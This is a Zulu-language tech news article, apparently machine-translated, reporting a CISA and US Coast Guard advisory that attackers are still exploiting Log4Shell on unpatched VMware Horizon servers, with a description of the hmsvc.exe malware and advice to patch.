Izigebengu Zezigebengu Ziyaqhubeka Nokuxhaphaza Ukuba Sengozini kwe-Log4Shell kuma-VMware Horizon Systems

Darkcrizt

Imizuzu ye-4

I-US Cyber ​​​​Security and Infrastructure Agency (CISA) kanye ne-US Coast Guard Cyber ​​​​Command (CGCYBER) bamemezele ngezeluleko zezokuphepha ku-inthanethi (CSA) ukuthi Ubungozi be-Log4Shell (CVE-2021-44228) zisaxhashazwa abaduni.

Kwamaqembu ama-hacker atholakele abasasebenzisa ubuthakathaka lokhu "APT" futhi kutholakale ukuthi bebehlasela kumaseva e-VMware Horizon kanye neSango Lokufinyelela Elihlanganisiwe (UAG) ukuze uthole ukufinyelela kokuqala ezinhlanganweni ezingasebenzisanga iziqephu ezitholakalayo.

I-CSA ihlinzeka ngolwazi, okuhlanganisa amaqhinga, amasu, nezinqubo kanye nezinkomba zokuyekethisa, olutholakala ezenzweni ezimbili eziphathelene nezimpendulo zezigameko kanye nokuhlaziywa kwe-malware yamasampuli atholwe kumanethiwekhi ezisulu.

I-athikili ehlobene:
I-Log4Shell, ubungozi obubalulekile ku-Apache Log4j 2 obuthinta amaphrojekthi amaningi we-Java

Kulabo abangazie Log4Shell, kufanele wazi ukuthi lokhu kusengozini eyaqala ukuvela ngoDisemba futhi yagxila kakhulu ekubeni sengozini itholakala ku-Apache Log4j, okubonakala njengohlaka oludumile lokuhlela ukungena kuzinhlelo zokusebenza ze-Java, okuvumela ikhodi engafanele ukuthi isetshenziswe lapho inani elifomethwe ngokukhethekile libhalwa kusibhalisi ngefomethi ethi "{jndi: URL}".

Ukuba sengozini Kuyaphawuleka ngoba ukuhlasela kungenziwa ku-Java iziceloBarekhoda amanani atholwe emithonjeni yangaphandle, isibonelo ngokubonisa amanani ayinkinga emilayezweni yamaphutha.

Kuyabonakala ukuthi cishe wonke amaphrojekthi asebenzisa izinhlaka ezifana ne-Apache Struts, Apache Solr, Apache Druid noma Apache Flink ayathinteka, kufaka phakathi iSteam, i-Apple iCloud, amaklayenti eMinecraft namaseva.

Isexwayiso esigcwele sichaza izehlakalo ezimbalwa zakamuva lapho izigebengu ze-inthanethi zisebenzise ngempumelelo ukuba sengozini ukuze bathole ukufinyelela. Okungenani ekuvumelaneni okukodwa okuqinisekisiwe, abalingisi baqoqe futhi bakhipha ulwazi olubucayi kunethiwekhi yesisulu.

Ukusesha okusongelayo okwenziwa yi-US Coast Guard Cyber ​​​​Command kubonisa ukuthi abalingisi abasabisayo baxhaphaze i-Log4Shell ukuze bathole ukufinyelela kwenethiwekhi okokuqala kusulu esingadalulwanga. Balayishe ifayela le-malware elithi “hmsvc.exe.”, elenza njengesisetshenziswa sezokuphepha se-Microsoft Windows SysInternals LogonSessions.

Okushumekwe ngaphakathi kohlelo olungayilungele ikhompuyutha kuqukethe amakhono ahlukahlukene, okuhlanganisa ukugawulwa kwe-keystroke kanye nokuqaliswa kokulayishwa okukhokhelwayo okwengeziwe, futhi kunikeza isixhumi esibonakalayo esinesithombe sokufinyelela isistimu yedeskithophu ye-Windows yesisulu. Ingasebenza njengommeleli wokuqondisa nokulawula, ovumela u-opharetha oqhelile ukuthi afinyelele phambili kunethiwekhi, kusho ama-ejensi.

Ukuhlaziywa kuphinde kwathola ukuthi i-hmsvc.exe ibisebenza njenge-akhawunti yesistimu yendawo enezinga eliphezulu kakhulu lelungelo, kodwa ayizange ichaze ukuthi abahlaseli bawaphakamise kanjani amalungelo abo kulelo qophelo.

I-CISA kanye nonogada basoGwini bayancoma ukuthi zonke izinhlangano faka izakhiwo ezibuyekeziwe ukuze uqinisekise ukuthi izinhlelo ze-VMware Horizon ne-UAG ethintekile sebenzisa inguqulo yakamuva.

Isexwayiso sengeze ngokuthi izinhlangano kufanele zihlale zigcina isoftware isesikhathini futhi zibeke phambili ukuchibiyela ubungozi obaziwayo obuxhashaziwe. Izindawo zokuhlasela ezibhekene ne-inthanethi kufanele zincishiswe ngokubamba izinsiza ezibalulekile endaweni ehlukaniswe izigaba ezingenamasosha.

“Ngokusekelwe enanini lamaseva e-Horizon kusethi yethu yedatha engacishiwe (angu-18% kuphela afakwe nezichibiyelo kusukela ngoLwesihlanu olwedlule ebusuku), kusengozini enkulu yokuthi lokhu kuzothinta kabi amakhulu, uma kungenjalo izinkulungwane, zamabhizinisi. . Le mpelasonto futhi iphawula okokuqala ngqa ukubona ubufakazi bokudlondlobala okusabalele, kusuka ekufinyeleleni kokuqala kuya ekuqaleni kokuthatha izinyathelo ezinobutha kumaseva e-Horizon. "

Ukwenza kanjalo kuqinisekisa izilawuli eziqinile zokufinyelela kumjikelezo wenethiwekhi futhi akusokhaya izinsizakalo ezibhekene ne-inthanethi ezingabalulekile ekusebenzeni kwebhizinisi.

I-CISA ne-CGCYBER zikhuthaza abasebenzisi nabaphathi ukuthi babuyekeze zonke izinhlelo ezithintekile ze-VMware Horizon ne-UAG zibe izinguqulo zakamuva. Uma izibuyekezo noma ama-workaround azange asetshenziswe ngokushesha ngemva kokukhishwa kwezibuyekezo ze-VMware ze-Log4Shell , phatha wonke amasistimu e-VMware athintekile njengasengozini. Bona I-CSA Malicious Cyber ​​​​Actors Qhubeka nokusebenzisa i-Log4Shell ku-VMware Horizon Systems ukuze uthole ulwazi olwengeziwe nezincomo ezengeziwe.

Okokugcina uma unentshisekelo yokwazi kabanzi ngakho, ungabheka imininingwane Kulesi sixhumanisi esilandelayo.


Shiya umbono wakho

Ikheli lakho le ngeke ishicilelwe. Ezidingekayo ibhalwe nge *

*

*

  1. Ubhekele imininingwane: Miguel Ángel Gatón
  2. Inhloso yedatha: Lawula Ugaxekile, ukuphathwa kwamazwana.
  3. Ukusemthethweni: Imvume yakho
  4. Ukuxhumana kwemininingwane: Imininingwane ngeke idluliselwe kubantu besithathu ngaphandle kwesibopho esisemthethweni.
  5. Isitoreji sedatha: Idatabase ebanjwe yi-Occentus Networks (EU)
  6. Amalungelo: Nganoma yisiphi isikhathi ungakhawulela, uthole futhi ususe imininingwane yakho.